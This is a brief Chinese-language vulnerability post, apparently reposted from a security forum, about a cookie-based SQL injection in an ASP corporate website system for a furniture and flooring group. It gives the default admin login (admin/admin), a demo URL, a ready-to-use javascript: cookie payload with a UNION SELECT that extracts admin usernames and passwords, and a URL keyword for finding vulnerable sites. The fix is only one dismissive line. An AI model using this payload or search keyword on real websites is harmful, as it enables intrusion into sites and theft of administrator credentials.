by Mr.DzY www.0855.tv
源码介绍: 全能型企业网站系统-集团漂亮大气版(双版本简繁),最新优化后台及关键词版本,防SQL注入。 管理员地址:admin/admin_login.asp 管理员账号:admin 管理员密码:admin
Demo url: web.xf869.com/02/
PS:看到了成千上万的这类系统了。都TMD一个样。版权就不清楚了。
源码下载: http://www.2cto.com/ym/201109/29281.html
exp: javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
关键字: CompVisualizeBig. asp ?id=
修复:cookies注入问题修复不用多说了
查看更多关于家具地板集团网站整站v1.0 cookies注入漏洞及修复的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11441